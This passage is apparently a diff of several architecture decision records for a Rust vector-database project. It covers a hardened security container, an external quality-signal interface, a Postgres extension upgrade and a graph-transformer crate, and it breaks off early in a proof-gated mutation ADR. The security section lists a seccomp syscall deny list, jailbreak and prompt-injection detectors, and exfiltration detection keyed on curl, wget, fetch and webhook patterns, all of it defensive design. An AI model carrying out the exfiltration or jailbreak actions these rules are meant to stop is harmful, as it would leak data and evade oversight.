├── INDEX_SEG (0x02) HNSW index over threat vectors (m=32)
├── CRYPTO_SEG (0x0C) Ed25519 keys + TEE-bound key records
├── WITNESS_SEG (0x0A) 30-entry security lifecycle chain
├── META_SEG (0x07) Security policy + RBAC config + AIDefence rules
├── PROFILE_SEG (0x0B) Domain profile: RVSecurity
├── PolicyKernel (0x31) Gate thresholds + coherence config
├── MANIFEST_SEG (0x05) Signed manifest with hardening fields
└── Signature Footer Ed25519 over entire artifact
```
### Segment Budget
| Segment | Purpose | Size Budget |
|---------|---------|-------------|
| KERNEL_SEG | Hardened Linux bzImage | ~1.6 MB |
| EBPF_SEG | Firewall + syscall filter | ~8 KB |
| WASM_SEG | AIDefence WASM engine | ~256 KB |
| VEC_SEG | Threat embeddings (1000 x 512) | ~2 MB |
| INDEX_SEG | HNSW graph | ~512 KB |
| CRYPTO_SEG | Keys + TEE attestation records | ~4 KB |
| WITNESS_SEG | 30-entry audit chain | ~2 KB |
| META_SEG | Policy JSON + RBAC matrix | ~4 KB |
| PROFILE_SEG | Domain profile | ~512 B |
| PolicyKernel | Gate config | ~1 KB |
| MANIFEST_SEG | Signed directory | ~512 B |
| **Total** | | **~4.4 MB** |
## Security Layers
### Layer 1: Hardware Root of Trust (TEE)
```
┌─────────────────────────────────────┐
│ AttestationHeader (112 bytes) │
│ ├── platform: SGX/SEV-SNP/TDX/CCA │
│ ├── measurement: MRENCLAVE │
│ ├── signer_id: MRSIGNER │
│ ├── nonce: anti-replay │
│ ├── svn: security version │
│ └── quote: opaque attestation blob │
└─────────────────────────────────────┘
```
- Hardware TEE attestation records in CRYPTO_SEG
- TEE-bound key records: keys sealed to enclave measurement
- Platform verification: correct TEE + measurement + validity window
- Multi-platform: SGX, SEV-SNP, TDX, ARM CCA in single witness chain
### Layer 2: Kernel Hardening
```
KernelHeader flags:
KERNEL_FLAG_SIGNED = 0x0001
KERNEL_FLAG_COMPRESSED = 0x0002
KERNEL_FLAG_REQUIRES_TEE = 0x0004
KERNEL_FLAG_MEASURED = 0x0008
KERNEL_FLAG_REQUIRES_KVM = 0x0010
KERNEL_FLAG_ATTESTATION_READY = 0x0400
```
Linux tinyconfig + hardening options:
- `CONFIG_SECURITY_LOCKDOWN_LSM=y` — Kernel lockdown
- `CONFIG_SECURITY_LANDLOCK=y` — Landlock sandboxing
- `CONFIG_SECCOMP=y` — Syscall filtering
- `CONFIG_STATIC_USERMODEHELPER=y` — No dynamic module loading
- `CONFIG_STRICT_KERNEL_RWX=y` — W^X enforcement
- `CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y` — Memory init on alloc
- `CONFIG_BLK_DEV_INITRD=y` — Initramfs support
- No loadable modules, no debugfs, no procfs write, no sysfs write
### Layer 3: eBPF Enforcement
Two eBPF programs embedded:
1. **XDP Packet Filter** — Drop all traffic except allowed ports
- Allow: TCP 8443 (HTTPS API), TCP 9090 (metrics)
- Drop everything else at XDP layer (before kernel stack)
2. **Seccomp Syscall Filter** — Allowlist-only syscalls
- Allow: read, write, mmap, munmap, close, exit, futex, epoll_*
- Deny: execve, fork, clone3, ptrace, mount, umount, ioctl(TIOCSTI)
### Layer 4: AIDefence (WASM Engine)
The WASM segment contains a compiled AIDefence engine with:
| Detector | Latency | Description |
|----------|---------|-------------|
| Prompt Injection | <5ms | 30+ regex patterns + semantic similarity |
| Jailbreak | <5ms | DAN, role manipulation, system prompt extraction |
| PII Detection | <5ms | Email, phone, SSN, credit card, API keys, IP |
| Control Characters | <1ms | Unicode homoglyphs, null bytes, escape sequences |
| Behavioral Analysis | <100ms | EMA baseline deviation per user |
| Policy Verification | <500ms | Custom pattern matching + domain allowlists |
Threat levels: `none``low``medium``high``critical`
Default block threshold: `medium` (configurable via META_SEG policy)
### Layer 5: Cryptographic Integrity
- **Ed25519 signing** (RFC 8032): Every segment signed individually
- **Witness chain**: HMAC-SHA256 hash-chained audit entries
- **Content hashing**: SHAKE-256 truncated hashes in HardeningFields
- **SecurityPolicy::Paranoid**: Full chain verification on mount
- **Key rotation**: Witness entry records rotation event
### Layer 6: Access Control (RBAC + Coherence Gate)
```
Role Matrix:
┌──────────┬───────┬──────┬────────┬───────┬──────────┐
│ Role │ Write │ Read │ Derive │ Audit │ Gate │
├──────────┼───────┼──────┼────────┼───────┼──────────┤
│ Admin │ ✓ │ ✓ │ ✓ │ ✓ │ permit │
│ Operator │ ✓ │ ✓ │ ✗ │ ✓ │ permit │
│ Analyst │ ✗ │ ✓ │ ✗ │ ✓ │ defer │
│ Reader │ ✗ │ ✓ │ ✗ │ ✗ │ defer │
│ Auditor │ ✗ │ ✓ │ ✗ │ ✓ │ permit │
│ Guest │ ✗ │ ✗ │ ✗ │ ✗ │ deny │
└──────────┴───────┴──────┴────────┴───────┴──────────┘
```
Coherence Gate thresholds (PolicyKernel segment):
- `permit_threshold`: 0.85
- `defer_threshold`: 0.50
- `deny_threshold`: 0.0
- `escalation_window_ns`: 300_000_000_000 (5 min)
- `max_deferred_queue`: 100
## Capabilities Confirmed
| # | Capability | Segment | Verification |
|---|-----------|---------|-------------|
| 1 | TEE attestation (SGX, SEV-SNP, TDX, ARM CCA) | CRYPTO_SEG | Quote validation + binding check |
| 2 | TEE-bound key records | CRYPTO_SEG | Platform + measurement + validity |
| 3 | Hardened kernel boot | KERNEL_SEG | Flags: SIGNED, REQUIRES_TEE, MEASURED |
| 4 | KernelBinding anti-tamper | KERNEL_SEG | manifest_root_hash + policy_hash binding |
| 5 | eBPF packet filter | EBPF_SEG | XDP drop except allowlisted ports |
| 6 | eBPF syscall filter | EBPF_SEG | Seccomp allowlist enforcement |
| 7 | AIDefence prompt injection | WASM_SEG | 12 pattern detection |
| 8 | AIDefence jailbreak detect | WASM_SEG | DAN, role manipulation, 8 patterns |
| 9 | AIDefence PII scanning | WASM_SEG | Email, SSN, credit card, API keys |
| 10 | AIDefence code/encoding attack | WASM_SEG | XSS, eval, base64, unicode tricks |
| 11 | Self-bootstrapping | WASM_SEG x2 | Interpreter + Microkernel dual WASM |
| 12 | Security monitoring dashboard | DASHBOARD_SEG | Embedded security UI |
| 13 | Ed25519 segment signing | CRYPTO_SEG | Per-segment cryptographic proof |
| 14 | Witness chain audit trail | WITNESS_SEG | 30-entry HMAC-SHA256 chain |
| 15 | Content hash hardening | MANIFEST_SEG | SHAKE-256 content verification |
| 16 | Security policy (Paranoid) | MANIFEST_SEG | Full chain verification on mount |
| 17 | RBAC access control | META_SEG | 6 roles with permission matrix |
| 18 | Coherence Gate authorization | PolicyKernel | Anytime-valid decision with witness receipts |
| 19 | Key rotation | CRYPTO_SEG + WITNESS | Old key rejected, new key active |
| 20 | Tamper detection | WITNESS_SEG | 3/3 attacks rejected |
| 21 | Multi-tenant isolation | Store derivation | Lineage-linked derived stores |
| 22 | COW branching | Store branching | Forensic-grade immutable snapshots |
| 23 | Audited k-NN queries | WITNESS_SEG | Witness entry on every search |
| 24 | Threat vector similarity | VEC_SEG + INDEX | k-NN over 1000 threat embeddings |
| 25 | Data exfiltration detection | WASM_SEG | curl/wget/fetch/webhook patterns |
| 26 | Scalar quantization (int8) | rvf-quant | 4x compression, L2 distance preserved |
| 27 | Binary quantization (1-bit) | rvf-quant | 32x compression, Hamming distance |
| 28 | Filter deletion + compaction | Store lifecycle | Purge + reclaim dead space |
| 29 | QEMU requirements check | rvf-launch | Bootability proof (dry-run) |
| 30 | Freeze/seal | Store freeze | Permanent read-only immutability |
## MCP Tools (Security Container)
When served via MCP, the security RVF exposes these tools:
| # | Tool | Description |
|---|------|-------------|
| 1 | `aidefence_scan` | Analyze input for all threat types |
| 2 | `aidefence_sanitize` | Remove/mask dangerous content |
| 3 | `aidefence_validate_response` | Check LLM output safety |
| 4 | `aidefence_audit_log` | Get audit trail entries |
| 5 | `gate_permit` | Request action authorization |
| 6 | `gate_receipt` | Retrieve witness receipt by sequence |
| 7 | `gate_replay` | Deterministic decision replay |
| 8 | `tee_attest` | Generate TEE attestation record |
| 9 | `tee_verify` | Verify attestation quote |
| 10 | `tee_bind_key` | Create TEE-bound key record |
| 11 | `rbac_check` | Verify role permissions |
| 12 | `rbac_assign` | Assign role to principal |
| 13 | `threat_search` | k-NN over threat embeddings |
| 14 | `threat_ingest` | Add new threat signatures |
| 15 | `witness_chain` | Get/verify witness chain |
| 16 | `policy_get` | Read security policy config |
## HTTP API Endpoints
```
Port 8443 (TLS required in production)
POST /api/v1/scan AIDefence threat analysis
POST /api/v1/sanitize Input sanitization
POST /api/v1/validate Response validation
GET /api/v1/audit Audit log (paginated)
POST /api/v1/gate/permit Gate authorization request
GET /api/v1/gate/receipt/:seq Receipt by sequence
POST /api/v1/tee/attest Generate attestation
POST /api/v1/tee/verify Verify quote
POST /api/v1/rbac/check Permission check
POST /api/v1/threats/search Threat similarity search
GET /api/v1/status System health
GET /api/v1/policy Security policy config
```
## Implementation
### Files Created
| # | Path | Description |
|---|------|-------------|
| 1 | `examples/rvf/examples/security_hardened.rs` | Capstone security RVF example |
| 2 | `docs/adr/ADR-042-Security-RVF-AIDefence-TEE.md` | This ADR |
### Files Modified
| # | Path | Changes |
|---|------|---------|
| 1 | `examples/rvf/Cargo.toml` | Add `security_hardened` example entry |
## Verification
```bash
# Build the example
cd examples/rvf && cargo build --example security_hardened
# Run the example (creates + verifies the security RVF)
cargo run --example security_hardened
# Expected output (v3.0 — 30 capabilities):
# Phase 1: Threat vector knowledge base (1000 embeddings)
# Phase 2: Hardened kernel + KernelBinding (KERNEL_SEG)
# Phase 3: eBPF packet + syscall filters (EBPF_SEG)
# Phase 4: AIDefence WASM #1 Microkernel (WASM_SEG)
# Phase 4b: WASM #2 Interpreter (self-bootstrapping)
# Phase 5: Security monitoring dashboard (DASHBOARD_SEG)
# Phase 6: TEE attestation (SGX, SEV-SNP, TDX, ARM CCA)
# Phase 7: TEE-bound key records
# Phase 8: RBAC access control (6 roles)
# Phase 9: Coherence Gate policy (PolicyKernel)
# Phase 10: Scalar + Binary quantization
# Phase 11: 30-entry witness chain
# Phase 12: Ed25519 signing + Paranoid verification
# Phase 13: Tamper detection (3 tests)
# Phase 14: Filter deletion + compaction
# Phase 15: Multi-tenant isolation + COW
# Phase 16: AIDefence live tests (10 threat types)
# Phase 17: QEMU requirements check
# Phase 18: Component verification
# Phase 19: Freeze — permanent immutability seal
# All 30 capabilities verified.
```
## References
- ADR-033: Mandatory manifest signatures + HardeningFields
- ADR-041: RVF Cognitive Container identification
- ADR-041a: Detailed container implementations
- `rvf-types/src/attestation.rs`: AttestationHeader, TeePlatform
- `rvf-types/src/security.rs`: SecurityPolicy, HardeningFields
- `rvf-crypto`: Ed25519, witness chains, TEE attestation
- `ruvbot/src/security/AIDefenceGuard.ts`: AIDefence implementation

View File

@@ -0,0 +1,148 @@
# ADR-043: External Intelligence Providers for SONA Learning
| Field | Value |
|-------------|------------------------------------------------|
| Status | Accepted |
| Date | 2025-02-21 |
| Authors | @grparry (proposal), ruv (implementation) |
| Supersedes | — |
| Origin | PR #190 (renumbered from ADR-029 to avoid collision with ADR-029-rvf-canonical-format) |
## Context
RuvLLM's learning loops — SONA trajectory recording, HNSW embedding classification, and model router calibration — depend on quality signals to distinguish good executions from bad ones. Today, those signals come from ruvllm's own inference pipeline: a request completes, a quality score is computed internally, and the score feeds back into the learning loops.
This works when ruvllm is the entire system. But increasingly, ruvllm operates as one component within larger orchestration pipelines — workflow engines, CI/CD systems, coding assistants, multi-agent frameworks — where the *real* quality signal lives outside ruvllm. The external system knows whether the task actually met acceptance criteria, whether tests passed, whether the human reviewer approved or rejected the output. Ruvllm doesn't have access to any of that.
### The Gap
ADR-002 established Ruvector as the unified memory layer and defined the Witness Log schema with `quality_score: f32`. ADR-CE-021 established that multiple systems (RuvLLM, Prime-Radiant) can contribute trajectories to a shared SONA instance. But neither ADR addresses **how external systems feed quality data in**.
### Existing Extension Precedents
Ruvllm already has well-designed trait-based extension points:
| Trait | Purpose | Location |
|-------|---------|----------|
| `LlmBackend` | Pluggable inference backends | `crates/ruvllm/src/backends/mod.rs:756` |
| `Tokenizer` | Pluggable tokenization | Trait object behind `Option<&dyn Tokenizer>` |
An intelligence provider follows the same pattern — a trait that external integrations implement, registered with the intelligence loader at startup.
## Decision
**Option B — Trait-Based Intelligence Providers**, with a built-in file-based provider as the default implementation.
This gives the extensibility of a trait interface while keeping the simplicity of file-based exchange for the common case. Non-Rust systems write a JSON file; a built-in `FileSignalProvider` reads it. Rust-native integrations can implement the trait directly for tighter control.
## Architecture
```
IntelligenceLoader (new component in intelligence module)
├── register_provider(Box<dyn IntelligenceProvider>)
├── load_all_signals() -> Vec<QualitySignal>
│ ├── iterate registered providers
│ ├── call provider.load_signals()
│ └── merge with optional quality_weights()
└── Built-in: FileSignalProvider
├── reads JSON from .claude/intelligence/data/
└── returns Vec<QualitySignal>
```
### Integration Points
| Component | How Signals Flow In |
|-----------|-------------------|
| SONA Instant Loop | `QualitySignal.quality_score` → trajectory quality |
| SONA Background Loop | Batch of signals → router training data |
| Embedding Classifier | `task_description` → embedding, `outcome` → label |
| Model Router | `calibration_bias()` on `TaskComplexityAnalyzer` |
### Key Types
```rust
pub struct QualitySignal {
pub id: String,
pub task_description: String,
pub outcome: String, // "success", "partial_success", "failure"
pub quality_score: f32, // 0.0 - 1.0
pub human_verdict: Option<String>,
pub quality_factors: Option<QualityFactors>,
pub completed_at: String, // ISO 8601
}
pub struct QualityFactors {
pub acceptance_criteria_met: Option<f32>,
pub tests_passing: Option<f32>,
pub no_regressions: Option<f32>,
pub lint_clean: Option<f32>,
pub type_check_clean: Option<f32>,
pub follows_patterns: Option<f32>,
pub context_relevance: Option<f32>,
pub reasoning_coherence: Option<f32>,
pub execution_efficiency: Option<f32>,
}
pub trait IntelligenceProvider: Send + Sync {
fn name(&self) -> &str;
fn load_signals(&self) -> Result<Vec<QualitySignal>>;
fn quality_weights(&self) -> Option<ProviderQualityWeights> { None }
}
```
## Design Constraints
- **Zero overhead when unused.** No providers registered = no behavior change.
- **File-based by default.** Simplest provider reads a JSON file — no network calls.
- **No automatic weight changes.** Providers supply signals; weight changes are human decisions.
- **Backward compatible.** Existing loading continues unchanged. Providers are additive.
## Existing Code References
| Item | Status | Location |
|------|--------|----------|
| `LlmBackend` trait | EXISTS | `crates/ruvllm/src/backends/mod.rs:756` |
| `record_feedback()` | EXISTS | `crates/ruvllm/src/claude_flow/model_router.rs:646` |
| `QualityWeights` (metrics) | EXISTS | `crates/ruvllm/src/quality/metrics.rs:262` |
| `IntelligenceProvider` trait | NEW | `crates/ruvllm/src/intelligence/mod.rs` |
| `FileSignalProvider` | NEW | `crates/ruvllm/src/intelligence/mod.rs` |
| `IntelligenceLoader` | NEW | `crates/ruvllm/src/intelligence/mod.rs` |
| `calibration_bias()` | NEW | `crates/ruvllm/src/claude_flow/model_router.rs` |
## Implementation
### Files Created
| # | Path | Description |
|---|------|-------------|
| 1 | `crates/ruvllm/src/intelligence/mod.rs` | IntelligenceProvider trait, QualitySignal, FileSignalProvider, IntelligenceLoader |
| 2 | `docs/adr/ADR-043-external-intelligence-providers.md` | This ADR |
### Files Modified
| # | Path | Changes |
|---|------|---------|
| 1 | `crates/ruvllm/src/lib.rs` | Add `pub mod intelligence;` + re-exports |
| 2 | `crates/ruvllm/src/claude_flow/model_router.rs` | Add `calibration_bias()` to TaskComplexityAnalyzer |
## Consequences
### Positive
1. **Clean integration boundary.** External systems implement one trait instead of modifying ruvllm internals.
2. **Follows established patterns.** Same approach as `LlmBackend` — familiar to anyone who has extended ruvllm.
3. **Language-agnostic in practice.** Non-Rust systems write JSON; `FileSignalProvider` reads it.
4. **Graceful when absent.** No providers = no behavior change. File missing = empty signal set.
5. **Testable.** Providers can be unit-tested independently.
### Negative
1. One more trait to maintain (small surface: 2 required methods, 1 optional).
2. Non-Rust systems must use the file path unless they write a Rust wrapper.
## Related Decisions
- **ADR-002**: RuvLLM Integration with Ruvector — Witness Log schema with `quality_score: f32`
- **ADR-029**: RVF Canonical Format — (the existing ADR-029, not to be confused with this one)
- **ADR-CE-021**: Shared SONA — multiple external systems contributing trajectories
- **ADR-004**: KV Cache Management — tiered, policy-driven approach benefiting from better calibration

View File

@@ -0,0 +1,111 @@
# ADR-044: ruvector-postgres v0.3 Extension Upgrade
## Status
Accepted — Implementation in progress
## Context
ruvector-postgres v2.0.4 has 101 SQL functions across 20+ modules. The workspace contains 5 mature crates (`ruvector-solver`, `ruvector-math`, `ruvector-attention`, `sona`, `ruvector-domain-expansion`) with production-quality algorithms not yet exposed as SQL functions. v0.3 integrates these crates without performance regression. All new functionality is feature-gated.
**Current Docker build features**: `pg17,graph-complete,gated-transformer`
## Decision
Add ~42 new SQL functions in 6 new feature-gated modules, integrating 4 workspace crates. Bump extension version to `0.3.0`. Update Docker build to include Tier 1+2 features.
## New Feature Flags
```toml
solver = ["dep:ruvector-solver"]
math-distances = ["dep:ruvector-math"]
tda = ["dep:ruvector-math"]
attention-extended = ["attention", "dep:ruvector-attention"]
sona-learning = ["dep:ruvector-sona"]
domain-expansion = ["dep:ruvector-domain-expansion"]
analytics-complete = ["solver", "math-distances", "tda"]
ai-complete-v3 = ["ai-complete", "attention-extended", "sona-learning"]
all-features-v3 = ["all-features", "analytics-complete", "ai-complete-v3", "domain-expansion"]
```
## New Modules
| Phase | Module | Feature Flag | Functions | Dependency |
|-------|--------|-------------|-----------|------------|
| 1 | `solver` | `solver` | 11 | `ruvector-solver` |
| 2 | `math` | `math-distances` | 12 | `ruvector-math` |
| 3 | `tda` | `tda` | 7 | `ruvector-math` |
| 4 | `attention` (extended) | `attention-extended` | 7 | `ruvector-attention` |
| 5 | `sona` | `sona-learning` | 4 | `sona` |
| 5 | `domain_expansion` | `domain-expansion` | 1 | `ruvector-domain-expansion` |
## New Functions Summary
### Solver (11)
- `ruvector_pagerank`, `ruvector_pagerank_personalized`, `ruvector_pagerank_multi_seed`
- `ruvector_solve_sparse`, `ruvector_solve_laplacian`, `ruvector_effective_resistance`
- `ruvector_graph_pagerank`, `ruvector_solver_info`, `ruvector_matrix_analyze`
- `ruvector_conjugate_gradient`, `ruvector_graph_centrality`
### Math Distances & Spectral (12)
- `ruvector_wasserstein_distance`, `ruvector_sinkhorn_distance`, `ruvector_sliced_wasserstein`
- `ruvector_kl_divergence`, `ruvector_jensen_shannon`, `ruvector_fisher_information`
- `ruvector_spectral_cluster`, `ruvector_chebyshev_filter`, `ruvector_graph_diffusion`
- `ruvector_product_manifold_distance`, `ruvector_spherical_distance`, `ruvector_gromov_wasserstein`
### TDA (7)
- `ruvector_persistent_homology`, `ruvector_betti_numbers`, `ruvector_bottleneck_distance`
- `ruvector_persistence_wasserstein`, `ruvector_topological_summary`
- `ruvector_embedding_drift`, `ruvector_vietoris_rips`
### Extended Attention (7)
- `ruvector_linear_attention`, `ruvector_sliding_window_attention`, `ruvector_cross_attention`
- `ruvector_sparse_attention`, `ruvector_moe_attention`, `ruvector_hyperbolic_attention`
- `ruvector_attention_benchmark`
### Sona & Domain Expansion (5)
- `ruvector_sona_learn`, `ruvector_sona_apply`, `ruvector_sona_ewc_status`, `ruvector_sona_stats`
- `ruvector_domain_transfer`
## Performance Targets
| Metric | Target | Method |
|--------|--------|--------|
| PageRank 10K nodes | < 50ms | Forward Push O(1/epsilon) |
| Wasserstein 1K dims | < 10ms | Sinkhorn |
| Spectral clustering 10K | < 200ms | Chebyshev K=20 |
| Persistent homology 500 pts | < 100ms | Vietoris-Rips |
| Linear attention 4K seq | < 2ms | O(n) complexity |
| Existing functions | No regression | Feature-gated isolation |
## Docker Build Change
```dockerfile
# Before:
--features pg${PG_VERSION},graph-complete,gated-transformer
# After:
--features pg${PG_VERSION},graph-complete,gated-transformer,analytics-complete,attention-extended
```
## Compatibility
- `ruvector-solver` and `ruvector-math` use workspace `thiserror = "2.0"` while ruvector-postgres uses `thiserror = "1.0"`. Errors are mapped at the boundary via `pgrx::error!()`. Both versions coexist via Cargo semver.
- All new functions are feature-gated, ensuring zero impact on existing builds.
## Verification
```sql
SELECT ruvector_version();
SELECT ruvector_pagerank('{"edges":[[0,1],[1,2],[2,0]]}'::jsonb);
SELECT ruvector_wasserstein_distance(ARRAY[0.5,0.5]::real[], ARRAY[0.3,0.7]::real[]);
SELECT ruvector_persistent_homology('[[1,0],[0,1],[-1,0],[0,-1]]'::jsonb, 1, 3.0);
SELECT ruvector_linear_attention(ARRAY[1,0,0,0]::real[], '[[1,0,0,0]]'::jsonb, '[[5,10]]'::jsonb);
SELECT ruvector_solver_info();
```
## Consequences
- Extension grows from ~101 to ~143 SQL functions
- Docker image size increases by ~5-10MB due to additional crate dependencies
- Build time increases by ~30-60s for full feature builds
- All new functionality is opt-in via feature flags

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,210 @@
# ADR-046: Graph Transformer Unified Architecture
## Status
Accepted
## Date
2026-02-25
## Context
RuVector has accumulated eight specialized crates that together provide the building blocks for a full graph transformer stack: `ruvector-verified` for formal proofs, `ruvector-gnn` for graph neural network layers, `ruvector-attention` for 18+ attention mechanisms, `ruvector-mincut-gated-transformer` for energy-gated inference, `ruvector-solver` for sublinear sparse algorithms, `ruvector-coherence` for quality measurement, `ruvector-graph` for property graphs with Cypher, and `ruvector-mincut` for graph partitioning.
These crates were developed independently, each with their own error types, configuration patterns, and public APIs. Users who want to build proof-gated graph transformers must manually wire them together, handle error conversion between six different `thiserror` enums, coordinate feature flags across eight `Cargo.toml` files, and discover API composition patterns through trial and error.
We need a single `ruvector-graph-transformer` crate that composes these building blocks into a unified graph transformer with proof-gated mutation as the central control substrate, without duplicating any existing code.
## Decision
We will create `ruvector-graph-transformer` as a composition crate at `crates/ruvector-graph-transformer/` that delegates to existing crates and provides a unified entry point, error type, and configuration surface. The crate will not reimplement any algorithm -- it wraps, delegates, and orchestrates.
### Module Structure
```
crates/ruvector-graph-transformer/
src/
lib.rs # GraphTransformer unified entry point, re-exports
error.rs # Unified GraphTransformerError composing sub-crate errors
config.rs # Unified configuration with builder pattern
proof_gated/
mod.rs # ProofGate<T>, ProofScope, MutationLedger
gate.rs # GateController bridging to ruvector-verified::gated
attestation.rs # Attestation chain composition via ProofAttestation
epoch.rs # Epoch boundaries for proof algebra upgrades
sublinear_attention/
mod.rs # SublinearGraphAttention trait and registry
lsh.rs # LSH-attention on spectral coordinates
ppr.rs # PPR-sampled attention via ruvector-solver
spectral_sparsify.rs # Spectral sparsification for edge reduction
physics/
mod.rs # PhysicsLayer: energy gates, diffusion, PDE attention
energy.rs # Bridges to ruvector-mincut-gated-transformer::EnergyGate
diffusion.rs # Bridges to ruvector-attention::DiffusionAttention
biological/
mod.rs # BiologicalLayer: spiking attention, EWC
spiking.rs # Bridges to ruvector-mincut-gated-transformer::spike
ewc.rs # Bridges to ruvector-gnn::ElasticWeightConsolidation
self_organizing/
mod.rs # Mincut-driven topology adaptation
partitioner.rs # Bridges to ruvector-mincut
coarsening.rs # Hierarchical graph coarsening with learned pooling
verified_training/
mod.rs # VerifiedTrainer, TrainingCertificate
pipeline.rs # Proof-carrying training loop
invariants.rs # Per-step invariant specifications
manifold/
mod.rs # Manifold-aware operations
hyperbolic.rs # Bridges to ruvector-attention::HyperbolicAttention
mixed_curvature.rs # Bridges to ruvector-attention::MixedCurvatureFusedAttention
temporal/
mod.rs # Time-varying graph support
snapshot.rs # Temporal graph snapshots with proof chains
evolving.rs # Evolving attention over graph time series
```
### Feature Flags
Each module is gated behind an opt-in feature flag so users pay only for what they use:
```toml
[features]
default = ["proof-gated"]
# Core (always available when enabled)
proof-gated = ["ruvector-verified/gated-proofs", "ruvector-verified/fast-arena"]
# Attention mechanisms
sublinear-attention = ["ruvector-solver/forward-push", "ruvector-solver/hybrid-random-walk", "ruvector-attention"]
physics = ["ruvector-mincut-gated-transformer/energy_gate", "ruvector-attention/pde_attention"]
biological = ["ruvector-mincut-gated-transformer/spike_attention", "ruvector-gnn"]
manifold = ["ruvector-attention/math"]
# Graph structure
self-organizing = ["ruvector-mincut/canonical", "ruvector-graph"]
temporal = ["ruvector-graph/temporal"]
# Training
verified-training = ["ruvector-gnn", "ruvector-verified/all-proofs", "ruvector-coherence/spectral"]
# Convenience
full = ["proof-gated", "sublinear-attention", "physics", "biological",
"manifold", "self-organizing", "temporal", "verified-training"]
```
### Unified Entry Point
The `GraphTransformer` struct is the primary public API. It is generic over the graph representation and parameterized by a `GraphTransformerConfig`:
```rust
pub struct GraphTransformer<G: GraphRepr = DefaultPropertyGraph> {
config: GraphTransformerConfig,
proof_env: ProofEnvironment, // from ruvector-verified
arena: FastTermArena, // from ruvector-verified::fast_arena
attention_registry: AttentionRegistry,
gate_controller: Option<GateController>,
graph: G,
}
impl<G: GraphRepr> GraphTransformer<G> {
pub fn new(config: GraphTransformerConfig, graph: G) -> Result<Self>;
pub fn forward(&mut self, input: &GraphBatch) -> Result<ProofGated<GraphOutput>>;
pub fn mutate(&mut self, op: GraphMutation) -> Result<ProofGated<MutationResult>>;
pub fn attention_scores(&self) -> &AttentionScores;
pub fn coherence(&self) -> CoherenceSnapshot;
pub fn proof_chain(&self) -> &[ProofAttestation];
}
```
### Error Handling
A single `GraphTransformerError` enum composes errors from all sub-crates using `#[from]` conversions via `thiserror`:
```rust
#[derive(Debug, thiserror::Error)]
pub enum GraphTransformerError {
#[error(transparent)]
Verification(#[from] ruvector_verified::VerificationError),
#[error(transparent)]
Gnn(#[from] ruvector_gnn::GnnError),
#[error(transparent)]
Attention(#[from] ruvector_attention::AttentionError),
#[error(transparent)]
Graph(#[from] ruvector_graph::GraphError),
#[error(transparent)]
Solver(#[from] ruvector_solver::error::SolverError),
#[error("proof gate rejected mutation: {reason}")]
ProofGateRejected { reason: String, tier: ProofTier },
#[error("coherence below threshold: {score} < {threshold}")]
CoherenceBelowThreshold { score: f64, threshold: f64 },
#[error("epoch boundary: proof algebra upgrade required")]
EpochBoundary { current_epoch: u64, required_epoch: u64 },
}
```
### No-std Compatibility
Core types in `proof_gated/` (`ProofGate<T>`, `ProofScope`, `MutationLedger`) are `no_std` compatible via conditional compilation. They use `core::` primitives and avoid heap allocation on the critical path. The `alloc` feature gates `Vec`-based attestation chains for `no_std` environments with an allocator.
### Dependency Graph
```
ruvector-graph-transformer
|-- ruvector-verified (proof gates, attestations, FastTermArena)
|-- ruvector-gnn (GNN layers, EWC, training, mmap)
|-- ruvector-attention (18+ attention mechanisms)
|-- ruvector-mincut-gated-transformer (energy gates, spiking, Mamba SSM)
|-- ruvector-solver (sublinear sparse algorithms)
|-- ruvector-coherence (coherence measurement, spectral scoring)
|-- ruvector-graph (property graph, Cypher queries)
|-- ruvector-mincut (partitioning, canonical min-cut)
```
All dependencies use path-relative references (`path = "../ruvector-verified"`) and workspace version (`version = "2.0.4"`) except `ruvector-verified` (version `"0.1.1"`) and `ruvector-mincut-gated-transformer` (version `"0.1.0"`), which have independent versioning.
## Consequences
### Positive
- Users get a single dependency (`ruvector-graph-transformer`) instead of coordinating eight crates
- Feature flags keep compile times low for users who only need a subset
- Unified error type eliminates manual `map_err` boilerplate at call sites
- `GraphTransformer` struct provides discoverability -- IDE autocomplete shows all available operations
- No code duplication -- every algorithm lives in exactly one crate
- The composition pattern means sub-crate improvements automatically flow through
### Negative
- Adding a new attention mechanism to `ruvector-attention` requires updating `AttentionRegistry` in this crate
- The unified error enum grows as sub-crates add error variants
- Feature flag combinatorics create a large CI test matrix (mitigated by testing `default` and `full` profiles)
- `GraphTransformer` struct may become a god-object if module boundaries are not enforced during review
### Risks
- Circular dependency: `ruvector-graph-transformer` depends on `ruvector-graph`, which must not depend back. Enforced by `cargo publish --dry-run` in CI
- Version skew: if `ruvector-verified` ships a breaking change at 0.2.0, the composition crate must update its bridge code. Mitigated by workspace-level `[patch]` during development
- Feature flag conflicts: enabling `biological` and `physics` simultaneously must not cause duplicate symbol errors from `ruvector-mincut-gated-transformer`. Verified by the `full` feature CI test
## Implementation
1. Create `crates/ruvector-graph-transformer/` with the module structure above
2. Add to `[workspace.members]` in root `Cargo.toml`
3. Implement `proof_gated/` first (it is the dependency of every other module)
4. Implement each module as a thin bridge layer with integration tests
5. Add `crates/ruvector-graph-transformer-wasm/` and `crates/ruvector-graph-transformer-node/` (see ADR-050)
6. CI: test `--features default`, `--features full`, and each individual feature in isolation
## References
- ADR-045: Lean-Agentic Integration (establishes `ruvector-verified` and `ProofEnvironment`)
- ADR-015: Coherence-Gated Transformer (sheaf attention design)
- ADR-047: Proof-Gated Mutation Protocol (details the `ProofGate<T>` type)
- ADR-048: Sublinear Graph Attention (attention complexity analysis)
- ADR-049: Verified Training Pipeline (proof-carrying training)
- ADR-050: Graph Transformer WASM and Node.js Bindings
- `crates/ruvector-verified/src/gated.rs`: `ProofTier`, `route_proof`, `verify_tiered`
- `crates/ruvector-attention/src/lib.rs`: 18+ attention mechanism re-exports
- `crates/ruvector-solver/src/lib.rs`: `SolverEngine` trait, sublinear algorithms
- `crates/ruvector-mincut-gated-transformer/src/energy_gate.rs`: `EnergyGate`, `EnergyGateConfig`

View File

@@ -0,0 +1,236 @@
# ADR-047: Proof-Gated Mutation Protocol
## Status
Accepted
## Date
2026-02-25
## Context
RuVector's graph transformer operates on mutable graph state -- nodes are added, edges are rewired, attention weights are updated, and topology evolves during self-organizing operations. In safety-critical deployments (genomic pipelines, financial computation, cognitive containers), every mutation must be auditable and formally justified.
